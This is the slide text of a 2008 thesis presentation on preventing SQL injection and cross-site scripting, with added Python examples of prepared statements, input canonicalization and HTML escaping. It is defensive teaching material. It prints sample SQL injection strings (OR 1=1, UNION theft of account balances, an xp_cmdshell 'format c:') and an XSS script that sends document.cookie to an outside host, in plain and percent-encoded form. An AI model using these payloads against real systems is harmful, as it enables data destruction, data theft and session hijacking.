Whatever it takes - Fixing SQLIA and XSS in the process
Concept presentation about my diploma thesis: process ideas on how to prevent SQLIA and XSS vulnerabilities in web applications.


1. Whatever it takes: Fixing SQLIA and XSS in the process. Diploma Thesis Outline Presentation, Florian Thiel. Seminar “Beiträge zum Software Engineering”, FU Berlin, 11/06/2008
2. OWASP Top 10 2007
    1. XSS
    2. Injection Flaws
    3. Malicious File Execution
    4. Insecure Direct Object Reference
    5. Cross-Site Request Forgery
4. © by xkcd: http://xkcd.com/327/
6. "SELECT firstname FROM Students WHERE (login = '%s');" % login
    (© by xkcd: http://xkcd.com/327/)
7. "SELECT firstname FROM Students WHERE (login = '%s');" % login
    SELECT firstname FROM Students WHERE (login = 'Robert'); DROP TABLE Students; -- ');
    (© by xkcd: http://xkcd.com/327/)
8. SQLIA threats
    • data integrity
    • confidentiality
    • new attack vector
9. "UPDATE Users SET password = '%s' WHERE uid = '%s';" % (pw, uid)
10. UPDATE Users SET password = 'password' WHERE uid = 'robert' OR 1=1; --';
    Integrity
11. "SELECT product FROM Products WHERE productid = '%s';" % pid
12. SELECT product FROM Products WHERE productid = '0 UNION SELECT owner, balance FROM Accounts; --';
    Confidentiality
13. "SELECT product, price FROM products WHERE category = '%s';" % category
14. SELECT product, price FROM products WHERE categoryid = exec master..xp_cmdshell "format c:"-- ;
    New Attack Vector
15. Bad Mitigations
    • PHP: addslashes()
    • IDS blacklisting
    • validation blacklisting
16. Decent Mitigations
    stmt = prepare("SELECT name FROM Users WHERE uid = $1")
    db.execute(stmt, uid)
17. Why it's hard: Control / Data
18. More problems
    • validation context != execution context
    • really tolerant DBs
        • "SEL"+"ECT", anyone?
    • DBs trying to fix illegal SQL
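As an added example (not from the slides), the slide-9/10 pair and the slide-16 fix run against an in-memory SQLite database in Python; the Users rows, the function names and the database itself are constructed here.

```python
import sqlite3

# Constructed sample data (not from the slides): three accounts.
USERS = [("alice", "s3cret"), ("bob", "hunter2"), ("robert", "passw0rd")]


def make_db():
    """In-memory Users table filled with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (uid TEXT PRIMARY KEY, password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)", USERS)
    return conn


def vulnerable_update(conn, pw, uid):
    """Slide 9: the uid is pasted into the SQL text, so it can carry control
    (quotes, OR, comment) as well as data. Returns the rows changed."""
    sql = "UPDATE Users SET password = '%s' WHERE uid = '%s';" % (pw, uid)
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def safe_update(conn, pw, uid):
    """Slide 16: a prepared statement with bind parameters. The SQL text is
    fixed before any value is seen, so uid can only ever be compared as data."""
    cur = conn.execute("UPDATE Users SET password = ? WHERE uid = ?", (pw, uid))
    conn.commit()
    return cur.rowcount


def demo():
    """Runs both updates with the slide-10 uid. Returns (rows changed by the
    string-built query, rows changed by the prepared statement)."""
    injected_uid = "robert' OR 1=1; --"
    hit = vulnerable_update(make_db(), "password", injected_uid)
    miss = safe_update(make_db(), "password", injected_uid)
    return hit, miss


if __name__ == "__main__":
    print(demo())  # (3, 0): every password overwritten vs. no such uid
```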
19. Something different!?
    http://searchsite/search?keyword="<script>alert('you have been XSSed!')</script>"
21. “This issue isn't just about scripting, and there isn't necessarily anything cross site about it. So why the name? It was coined earlier on when the problem was less understood, and it stuck. Believe me, we have had more important things to do than think of a better name. <g>.” -- Marc Slemko, Apache.org
22. eval('user input') [1, 2]
    1) the essence of XSS
    2) limited only by the execution environment
23. XSS
    • code injection
    • popular in ECMAScript/Web2.0
24. Got cookies?
    <script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'+document.cookie</script>
25. Got cookies? (the same script as slide 24, percent-encoded byte by byte)
    %3c%73%63%72%69%70%74%3e%64%6f %63%75%6d%65%6e%74%2e%6c%6f %63%61%74%69%6f%6e%3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e %63%67%69%73%65%63%75%72 %69%74%79%2e%63%6f%6d%2f%63%67%69%2d %62%69%6e %2f%63%6f%6f%6b %69%65%2e%63%67%69%3f%27%20%2b%64%6f %63%75%6d%65%6e%74%2e%63%6f%6f%6b %69%65%3c %2f%73%63%72%69%70%74%3e
26. The Worm
27. (Non-working) XSS Mitigations
    • blacklisting of cribs
    • blacklisting of characters
28. Helpful mitigations
    • HTTPOnly cookies
    • Whitelisting of characters
29. Common flaws
    • HTML/XSS and SQL
        • mix data and control
        • have no well-defined execution environment
30. Common flaws
    • HTML/XSS and SQL
        • mix data and control
        • have no well-defined execution environment
        • have no “API”
31. Failure to sanitize data into a different plane
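Added example, not part of the deck: the slide-19 keyword checked three ways in Python, first with the crib blacklist of slide 27 applied to the raw parameter, then with canonicalization (slide 41) followed by the character whitelist of slide 28, and finally escaped for the HTML plane (slide 31). The crib list, the keyword alphabet and the decoding round limit are my assumptions.

```python
import html
import re
from urllib.parse import unquote

# Slide 19's search keyword, plus a fully percent-encoded copy of the same text
# (slide 25 does this to the cookie-stealing script of slide 24).
PLAIN = "<script>alert('you have been XSSed!')</script>"

def percent_encode_all(text):
    """Encode every byte as %xx, the way the slide-25 payload is written."""
    return "".join("%%%02x" % b for b in text.encode("utf-8"))

ENCODED = percent_encode_all(PLAIN)

# Slide 27's approach: a blacklist of cribs checked against the raw parameter.
CRIBS = ("<script", "javascript:", "onerror=")

def blacklist_ok(raw):
    """Accept unless a crib appears in the parameter as received. Slide 18's
    point: this judges bytes in the validation context, not the decoded text
    the browser's HTML parser (the execution context) will see."""
    lowered = raw.lower()
    return not any(crib in lowered for crib in CRIBS)

def canonicalize(raw, max_rounds=5):
    """Slide 41: bring input to one canonical form first. Percent-decode until
    the value stops changing so double encoding cannot hide anything; the
    round limit is an assumption, not a figure from the slides."""
    value = raw
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("input did not reach a canonical form")

# Assumed alphabet for this search box: letters, digits, space, _ and -.
KEYWORD_RE = re.compile(r"[A-Za-z0-9 _-]{1,64}")

def canonical_whitelist_ok(raw):
    """Slide 28: whitelist of characters, applied to the canonical form."""
    return KEYWORD_RE.fullmatch(canonicalize(raw)) is not None

def render_keyword(raw):
    """Slide 31: data echoed into the HTML plane is escaped for that plane, so
    the keyword stays text in the page rather than becoming markup."""
    return html.escape(canonicalize(raw), quote=True)
```

The blacklist accepts the encoded form because the crib is not visible until decoding, while the canonicalize-then-whitelist path rejects both forms and the escaped rendering never contains a `<`.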
32. Safe Query Objects
    • “real” SQL API
        • adds static types
        • dynamic queries still runtime evaluated
33. AntiSamy
    • Policy-based sanitation for HTML entities
    • “Types” (by RegEx)
    • (no semantics)
34. Another job well done!
35. GET /en-us/library/aa287673(VS.71).aspx HTTP/1.1
    Host: msdn.microsoft.com
    User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us,en;q=0.5
    Accept-Encoding: gzip,deflate
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 300
    Connection: keep-alive
    Referer: http://www.google.de/search?q=http+request+header+example&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
    Cache-Control: max-age=0
36. Hmm, are we missing something here?
37. Absolutely!
38. The interesting* part
    * what my thesis is really about
39. Make sure that the technical solutions are thoroughly applied
40. 1. Make developers use a reasonable architecture
    2. Make developers recognize a weakness when they meet one
    3. Make developers find weaknesses
    4. Make people actually fix things
41. 1) (Architecture)
    • centralization
    • canonicalization
    • have to be conservative
42. 2) (Recognition)
    • patterns?
    • flawed code examples in the wild
43. 3) (Detection)
    • automated flow analysis
    • code inspection
44. Code inspection
    • need a reading technique
        • defect-based reading
45. Artifacts
    • reviewer annotates suspicious code regions
        • e.g. @userinput, @output
    • makes review work visible in the source code
        • and more valuable since annotations can be reused
46. // @userinput(data)
    // [insert data into query, ignore non-alphanums]
    def insertAlphaNum(query, data):
        // [make sure data is canonical]
        c_data = data.toCharSet(...)
        c_data.replace(...)
        ...
        // [insert data into query]
        query.prepare(...)
        query.insert(data...)
        ...
47. 4) (Repair)
    • once weakness is known, developers should be motivated enough
    • focus is on keeping the code secure, minimizing effort
48. My tasks
    • provide practical architectural assumptions
    • construct effective reading method
        • + awareness of potential weaknesses
    • get a project to adopt my methods
49. Questions?
50. This presentation is licensed under a Creative Commons BY-SA license. Attribution for pictures through links. Slides, materials, progress etc. can be found @ http://www.noroute.de/blog/diplomathesis
51. Thank you!
